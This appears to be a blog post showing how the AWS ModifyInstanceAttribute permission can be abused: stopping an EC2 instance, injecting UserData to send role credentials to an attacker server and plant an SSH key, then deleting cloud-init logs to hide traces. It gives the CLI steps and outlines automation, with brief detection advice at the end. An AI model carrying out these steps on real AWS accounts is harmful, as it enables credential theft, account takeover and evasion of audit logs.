The Dangers of ModifyInstanceAttribute

Instance(s) takeover and Credential Exfiltration using ModifyInstanceAttribute

Harsha Koushik
Kernel Space
5 min readApr 29, 2024

--

Introduction

We will explore how a simple action like ModifyInstanceAttribute, which is not considered a privileged action in most cases, can be used to takeover instance(s), exfiltrate Instance Role credentials and possibly takeover the entire AWS account.

Good understanding of IMDSv1, v2, HTTP-token authentication, endpoints, and PUT-response-hop limits helps a lot while you read this.

What can be done using ModifyInstanceAttribute?

Like the API name suggests it is used to modify Instance Attributes. List of instance attributes this API allows to modify are here

https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_ModifyInstanceAttribute.html

Our interest and scope is mostly UserData attribute and optionally the groups attribute. UserData attribute is used to update the userdata of the instance, mostly used to install stuff while the instance boots up, but we will use it to persist in the EC2 and exifil EC2 role creds.

Note: Any ec2 needs to be in a stopped state to make modify instance attribute API call.

Exploiting ModifyInstanceAttribute

Attack Sequence Visualized

The attack sequence is —

  1. Stop the Instance
  2. Modify UserData of the EC2
  3. Start the Instance
  4. Cred exfil to http endpoint on attacker server.
  5. Decode Creds, optionally persist & clear the tracks.

Infra & Permissions Required to test this:

  1. 1 EC2 with a Role attached — this works for both IMDSv2 and v1, so can have any version enabled.
  2. One more ec2 — attacker server, where http server listens for creds and stores in a file.
  3. A simple user access key with ec2:StartInstances, ec2:StopInstances & ec2:ModifyInstanceAttribute. We will be using this user to make API calls to demonstrate these are the only permissions required to takeover any instance and its role credentials.

Once the infra and access key is ready, export access and secret key in your env and make an sts call — get-caller-identity to ensure the creds are working.

Action

  1. Stop the Victim Server — the EC2 which we want to takeover and exfiltrate credentials
aws ec2 stop-instances --instance-ids <instance-id> --region <region>

2. Modify the User Data file accordingly, replace the SSH key with your public key, replace attacker-server IP with your server IP where http server is running.

IMDSv2 — for v2, we will query token & use it to make metadata calls.

IMDSv1 — same script without using the token.

3. Store this file into userdata.txt.

4. Convert this file into Base64.

cat userdata.txt | base64 > ud.txt

5. Modify the InstanceAttribute UserData once the instance is in a stopped state.

aws ec2 modify-instance-attribute --attribute userData --value file://ud.txt --instance-id <instance-id> --region <region>

6. On the attacker VM, run the following script & ensure port 8000 is open to this EC2 IP, or 0.0.0.0, however you want it to be running.

python3 server.py &

7. Start the EC2 now & keep an eye on Attacker EC2, it should receive the Credentials in Base64 format saved into data.txt file.

8. Decode the creds & load them into env.

cat data.txt | base64 -d > creds.json
export AWS_ACCESS_KEY_ID=$(cat creds.json | jq -r '.AccessKeyId')
export AWS_SECRET_ACCESS_KEY=$(cat creds.json | jq -r '.SecretAccessKey')
export AWS_SESSION_TOKEN=$(cat creds.json | jq -r '.Token')

9. Perform an STS call and confirm they are indeed the Role Creds of the EC2 we extracted from.

aws sts get-caller-identity

10. Optionally you can also try SSHing into the instance using your Private key, common persistence tactic.

Note: We can use the groups attribute of ModifyInstanceAttribute to replace the security groups of the instance with the specified security group, in case SSH is not whitelisted and we do not have the permission to authorize an ingress rule.

Possibility of Account Takeover

Using this tactic, we will be able to take over any instance within the account, provided we have the necessary permissions and the EC2 instance has a role attached.

We can exploit instances that are in a stopped state as well, as long as they have a role attached. The steps would simply be to modify the userdata, start the instance, and then stop the instance.

Chances are high, if we are lucky, that at least a few instances in the account would have higher privileges. Think of instances having permissions like attach rolepolicy, attach userpolicy, poweruseraccess, or, in the best case scenario, admin access attached to a role xD.

Clearing the Tracks

Photo by Jacob Campbell on Unsplash

Places what we did would be logged are:

  1. CloudTrail — ModifyInstanceAttribute call with attribute UserData will be logged, but what userdata is added will be redacted by CloudTrail.
  2. Instance cloudinit logs and cloudinit-output.log, we can remove these files using the same userdata script, just write rm <these files> at the end.
  3. UserData is also stored in 4 locations from what I had observed
    a. /var/lib/cloud/instances/<instance-id>/user-data.txt
    b. /var/lib/cloud/instances/<instance-id>/user-data.txt.i
    c. /var/lib/cloud/instance/user-data.txt
    d. /var/lib/cloud/instance/user-data.txt.i
  4. Apart from files storing it, Metadata endpoint also stores the current userdata, it can be queried using —

curl http://169.254.169.254/latest/user-data

To clear the tracks, we can delete those log files on the instance & empty the userdata by stopping the instance, emptying the userdata and starting the instance again.

If you find any other place where userdata can be found, I would be curious to know, do comment.

Automation

We can create a simple script to automate this flow.

  1. List all the EC2s which have a role attached, both in stopped and running state.
  2. Filter out privileged roles & categorize based on IMDS v1 and v2.
  3. List of SGs which have 22 allowed from 0.0.0.0, and map which are already attached to the list of EC2s from our filter.
  4. Launch the attack, decide to steal creds, persist using SSH & optionally clear the tracks.

Detection & Prevention

  1. Monitor ModifyInstanceAttribute call if you are not already doing.
  2. Better to monitor ModifyInstanceMetadataOptions too which can downgrade IMDSv2 -> v1, though we can still make v1 requests invalid like mentioned in this article, better to monitor failed calls.
  3. We can restore cloudinit to its defaults ensuring it should not run UserScript every time the instance restarts like questioned here — https://repost.aws/knowledge-center/execute-user-data-ec2
  4. Better to control the cred usage using something like — adding conditions of where the Creds can be used from.

Refs: https://repost.aws/knowledge-center/execute-user-data-ec2
https://hackingthe.cloud/aws/exploitation/ local_ec2_priv_esc_through_user_data/#ec2modifyinstanceattribute
https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_ModifyInstanceAttribute.html

Please feel free to point out mistakes if there are any. Thank you for reading. You can connect with me on Linkedin / Twitter. Happy to answer your queries.

--

--